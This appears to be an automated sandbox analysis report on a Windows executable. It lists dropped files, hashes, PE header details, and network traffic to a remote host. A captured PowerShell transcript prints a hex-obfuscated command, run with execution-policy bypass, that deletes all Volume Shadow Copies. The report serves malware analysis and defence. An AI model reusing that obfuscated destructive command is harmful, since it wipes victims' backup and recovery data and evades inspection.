C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ayydvj.e53.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5w3taum.vrt.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Documents\20210501\PowerShell_transcript.390120.OOGUKqeP.20210501060116.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.339422654733665
Encrypted:	false
SSDEEP:	24:BxSAYxvBnRx2DOXe9oTs5Vj6n8WXHjeTKKjX4CIym1ZJXeoTs5Vj6nknxSAZ+:BZsvhRoOuPLj6HXqDYB1ZMLj6SZZ+
MD5:	9FD16CD42E397D6D6C28F63F47CA2141
SHA1:	5636002FFD1B2BB0167AF9ABF50BF6068C798C66
SHA-256:	C900519AF8A07B16BAFACC901C0C13CE26D2BF656EDCFE14C527943B8188B0AF
SHA-512:	53FD72B5A13C0FD39F94FBDA8C164B999CB65AFDB41B56DCB2FE43EBBA50C21467017CBD1999DBDA48CB0C43F09557BE4D802DB3D5CF3FA1CD5FBD387669BEB0
Malicious:	false
Preview:	.*********************..Windows PowerShell transcript start..Start time: 20210501060117..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 390120 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -ep bypass -c (0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2$_,2))};iex $s..Process ID: 1004..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..********************..******************..Command start time: 20210501060117..********************..PS>(0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7

C:\bootTel.dat.418990b0 Download File
Process:	C:\Users\user\Desktop\rUUR0qQI22.exe
File Type:	data
Category:	dropped
Size (bytes):	224
Entropy (8bit):	7.009843944595821
Encrypted:	false
SSDEEP:	6:ZFSeLyO1z9mLoqzqFhxOCeiS+KHcyFDln:Zce2s8uhxOwS+ny9ln
MD5:	180D7B9056941682005D0FEF63BB0D0C
SHA1:	1F83A48AFE20D3C1E06CBB41A255AED0986791FD
SHA-256:	3D880D670D2D34C94F78096A5ED4B16B1D968C8B30BB573D46A91950E6D99B9E
SHA-512:	8C359954D46F72629DFB0E39FC077A75C8D58D42EA50192C8DE4FBBBCCCC0839F6EBE84FBB28433B2353A6A237CB91D94CE23D51A534F1A223F709B6480287D4
Malicious:	false
Preview:	.....C.T.^.....K".r.....O..#B[...[...FR1a........{C..4..5P`.. .NO..Z..5...W......9...3.@..Q.J3.z...;3....O..9.af..GR.5........&..R.D..mi..r....x..2.%z.1....h.R@.9.?*.....:...W,.0:.N.R.pw.a....C.tL..>f...w....A.

\Device\Null Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39
Entropy (8bit):	4.458103180234288
Encrypted:	false
SSDEEP:	3:oNWXp5vXNuy:oNWXpF9uy
MD5:	F2AE8578BDB8EE0BB24FD934FAD89760
SHA1:	3917F76C992C6E5A2E6A539D6C06F9FC0FC4FAAA
SHA-256:	7295267CA3F3402FC8F32C7AFD5013BFADA50277B012787C012E02C8CC999EE9
SHA-512:	EC063562F2D0B236486405CB17C913D9ACA7A2F31E02A4923534264789C5CEA802D655F6BB47C3A8D677D4E36C6D0F1F0918BB80800D0DE78F4F2C70172B4B83
Malicious:	false
Preview:	C:\Users\user\Desktop\rUUR0qQI22.exe..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.255760938368303
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rUUR0qQI22.exe
File size:	60416
MD5:	9d418ecc0f3bf45029263b0944236884
SHA1:	eeb28144f39b275ee1ec008859e80f215710dc57
SHA256:	151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
SHA512:	82ced42a32f18ede4358459e08bed1adff85d49c952aca7a086571c5b71fd8b3185ea4306abd1f4e639a12f11161f43c73bf6049d76902d365c5a5e4c7e71f3d
SSDEEP:	768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvD7Y23W58:0x7Fu4/ihrhDTV1ylbcZ58
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w._.................r........................@..........................@......x.....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4081b5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FE377D3 [Wed Dec 23 17:01:07 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	17a4bd9c95f2898add97f309fc6f9bcd

Entrypoint Preview

Instruction
call 00007F5638BAB348h
push 00000000h
call 00007F5638BAB6A5h
jmp dword ptr [00409008h]
jmp dword ptr [00409000h]
jmp dword ptr [00409004h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9100	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13000	0xaec	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9010	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x10	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x71d3	0x7200	False	0.456448739035	data	6.26875888524	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x176	0x200	False	0.43359375	data	3.01371357706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x844c	0x6800	False	0.565993088942	data	5.673278586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x13000	0xaec	0xc00	False	0.7861328125	data	6.50124480291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, LoadLibraryA, ExitProcess

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
05/01/21-06:01:51.252678	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.1	192.168.2.3
05/01/21-06:01:52.739573	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.1	192.168.2.3
05/01/21-06:01:54.255221	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.1	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 1, 2021 06:00:50.495765924 CEST	49717	443	192.168.2.3	185.105.109.19
May 1, 2021 06:00:53.536501884 CEST	49717	443	192.168.2.3	185.105.109.19
May 1, 2021 06:00:59.537051916 CEST	49717	443	192.168.2.3	185.105.109.19
May 1, 2021 06:02:10.194205999 CEST	49739	443	192.168.2.3	185.105.109.19
May 1, 2021 06:02:13.209850073 CEST	49739	443	192.168.2.3	185.105.109.19
May 1, 2021 06:02:19.225950956 CEST	49739	443	192.168.2.3	185.105.109.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 1, 2021 06:00:40.966522932 CEST	50620	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:41.002168894 CEST	64938	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:41.023356915 CEST	53	50620	8.8.8.8	192.168.2.3
May 1, 2021 06:00:41.053606033 CEST	53	64938	8.8.8.8	192.168.2.3
May 1, 2021 06:00:41.148900032 CEST	60152	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:41.198815107 CEST	53	60152	8.8.8.8	192.168.2.3
May 1, 2021 06:00:41.953253984 CEST	57544	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:42.026010990 CEST	53	57544	8.8.8.8	192.168.2.3
May 1, 2021 06:00:42.063354969 CEST	55984	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:42.120246887 CEST	53	55984	8.8.8.8	192.168.2.3
May 1, 2021 06:00:42.851144075 CEST	64185	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:42.915077925 CEST	53	64185	8.8.8.8	192.168.2.3
May 1, 2021 06:00:43.219022036 CEST	65110	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:43.276004076 CEST	53	65110	8.8.8.8	192.168.2.3
May 1, 2021 06:00:44.202594042 CEST	58361	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:44.259861946 CEST	53	58361	8.8.8.8	192.168.2.3
May 1, 2021 06:00:45.210990906 CEST	63492	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:45.270266056 CEST	53	63492	8.8.8.8	192.168.2.3
May 1, 2021 06:00:46.344225883 CEST	60831	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:46.392858982 CEST	53	60831	8.8.8.8	192.168.2.3
May 1, 2021 06:00:47.306098938 CEST	60100	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:47.366225004 CEST	53	60100	8.8.8.8	192.168.2.3
May 1, 2021 06:00:48.305075884 CEST	53195	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:48.361843109 CEST	53	53195	8.8.8.8	192.168.2.3
May 1, 2021 06:00:49.295646906 CEST	50141	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:49.347126961 CEST	53	50141	8.8.8.8	192.168.2.3
May 1, 2021 06:00:50.416008949 CEST	53023	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:50.475758076 CEST	53	53023	8.8.8.8	192.168.2.3
May 1, 2021 06:00:50.717036963 CEST	49563	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:50.768558025 CEST	53	49563	8.8.8.8	192.168.2.3
May 1, 2021 06:00:51.608968019 CEST	51352	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:51.660464048 CEST	53	51352	8.8.8.8	192.168.2.3
May 1, 2021 06:00:52.845843077 CEST	59349	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:52.896435976 CEST	53	59349	8.8.8.8	192.168.2.3
May 1, 2021 06:00:53.666836977 CEST	57084	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:53.715416908 CEST	53	57084	8.8.8.8	192.168.2.3
May 1, 2021 06:00:55.109352112 CEST	58823	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:55.158065081 CEST	53	58823	8.8.8.8	192.168.2.3
May 1, 2021 06:00:55.960249901 CEST	57568	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:56.008778095 CEST	53	57568	8.8.8.8	192.168.2.3
May 1, 2021 06:00:56.753340960 CEST	50540	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:56.813231945 CEST	53	50540	8.8.8.8	192.168.2.3
May 1, 2021 06:00:57.707150936 CEST	54366	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:57.755716085 CEST	53	54366	8.8.8.8	192.168.2.3
May 1, 2021 06:00:58.642318964 CEST	53034	53	192.168.2.3	8.8.8.8
May 1, 2021 06:00:58.693648100 CEST	53	53034	8.8.8.8	192.168.2.3
May 1, 2021 06:01:16.652832031 CEST	57762	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:16.715946913 CEST	53	57762	8.8.8.8	192.168.2.3
May 1, 2021 06:01:23.843310118 CEST	55435	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:23.892951965 CEST	53	55435	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.893771887 CEST	50713	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.897634029 CEST	56132	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.901043892 CEST	58987	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.904541969 CEST	56579	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.907874107 CEST	60633	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.910656929 CEST	61292	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.914572001 CEST	63619	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.917876959 CEST	64938	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.921426058 CEST	61946	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.923356056 CEST	64910	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.927391052 CEST	52123	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.929951906 CEST	56130	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.933248997 CEST	56338	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.937216043 CEST	59420	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.939582109 CEST	58784	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.942275047 CEST	53	50713	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.944806099 CEST	63978	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.947837114 CEST	62938	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.949017048 CEST	53	56132	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.949796915 CEST	53	58987	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.951611996 CEST	55708	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.953780890 CEST	53	56579	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.954782963 CEST	56803	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.956371069 CEST	53	60633	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.960412979 CEST	57145	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.963365078 CEST	53	61292	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.964839935 CEST	53	63619	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.971564054 CEST	53	64938	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.972467899 CEST	53	61946	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.974160910 CEST	53	64910	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.978465080 CEST	53	52123	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.981174946 CEST	53	56130	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.984406948 CEST	53	56338	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.988234043 CEST	53	59420	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.990336895 CEST	53	58784	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.991772890 CEST	55359	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:50.993293047 CEST	53	63978	8.8.8.8	192.168.2.3
May 1, 2021 06:01:50.998806000 CEST	53	62938	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.002805948 CEST	53	55708	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.005855083 CEST	53	56803	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.009005070 CEST	64124	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.011784077 CEST	53	57145	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.015445948 CEST	63150	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.016604900 CEST	53279	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.029236078 CEST	53642	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.035084963 CEST	55667	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.040246964 CEST	53	55359	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.043488979 CEST	62476	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.049494982 CEST	49705	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.052990913 CEST	61477	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.057343960 CEST	61633	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.057506084 CEST	53	64124	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.061168909 CEST	55949	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.063864946 CEST	53	63150	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.065725088 CEST	57601	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.067914963 CEST	53	53279	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.070247889 CEST	49342	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.074764967 CEST	55439	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.078885078 CEST	57069	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.080574036 CEST	53	53642	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.083612919 CEST	53	55667	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.083661079 CEST	63975	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.088715076 CEST	56639	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.091912031 CEST	53	62476	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.093346119 CEST	51856	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.098010063 CEST	53	49705	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.098615885 CEST	56546	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.101469994 CEST	53	61477	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.104226112 CEST	62152	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.105896950 CEST	53	61633	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.108844042 CEST	53470	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.109612942 CEST	53	55949	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.112548113 CEST	55515	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.114151001 CEST	53	57601	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.121582031 CEST	53	49342	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.123229027 CEST	53	55439	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.130232096 CEST	53	57069	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.134908915 CEST	53	63975	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.140394926 CEST	53	56639	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.142889023 CEST	53	51856	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.151442051 CEST	53	56546	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.156848907 CEST	53	62152	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.158965111 CEST	53	53470	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.162628889 CEST	53	55515	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.240881920 CEST	64547	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.248117924 CEST	54856	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.258435011 CEST	64140	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.263031960 CEST	62271	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.272082090 CEST	57404	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.279566050 CEST	57712	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.288979053 CEST	64700	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.289503098 CEST	53	64547	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.296616077 CEST	53	54856	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.299921989 CEST	53724	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.307018995 CEST	53	64140	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.307804108 CEST	58051	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.311583042 CEST	53	62271	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.315642118 CEST	50491	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.320740938 CEST	53	57404	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.325706005 CEST	52529	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.328052998 CEST	53	57712	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.337141037 CEST	62724	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.337508917 CEST	53	64700	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.344819069 CEST	56059	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.349069118 CEST	53	53724	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.354617119 CEST	63060	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.358113050 CEST	53	58051	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.363224983 CEST	50118	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.365809917 CEST	53	50491	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.371421099 CEST	58079	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.375607967 CEST	53	52529	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.381490946 CEST	49289	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.390072107 CEST	53	62724	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.391027927 CEST	61034	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.393491983 CEST	53	56059	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.402148962 CEST	58241	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.403125048 CEST	53	63060	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.411828995 CEST	53	50118	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.413296938 CEST	60709	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.420103073 CEST	53	58079	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.426162958 CEST	63643	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.430216074 CEST	53	49289	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.437124968 CEST	61959	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.442437887 CEST	53	61034	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.453630924 CEST	53	58241	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.454277992 CEST	50980	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.461910009 CEST	53	60709	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.470943928 CEST	50067	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.474786043 CEST	53	63643	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.485667944 CEST	53	61959	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.487770081 CEST	58319	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.511013985 CEST	53	50980	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.518642902 CEST	64785	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.524205923 CEST	53	50067	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.532857895 CEST	60548	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.538281918 CEST	53	58319	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.542237043 CEST	51689	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.557326078 CEST	49686	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.565623045 CEST	62241	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.572849035 CEST	53	64785	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.574126959 CEST	56709	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.585335016 CEST	50263	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.587765932 CEST	53	60548	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.593329906 CEST	64372	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.594026089 CEST	53	51689	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.605875015 CEST	53	49686	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.614186049 CEST	53	62241	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.622803926 CEST	53	56709	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.626687050 CEST	49160	53	192.168.2.3	8.8.8.8
May 1, 2021 06:01:51.634243011 CEST	53	50263	8.8.8.8	192.168.2.3
May 1, 2021 06:01:51.641819000 CEST	53	64372	8.8.8.8	192.168.2.3
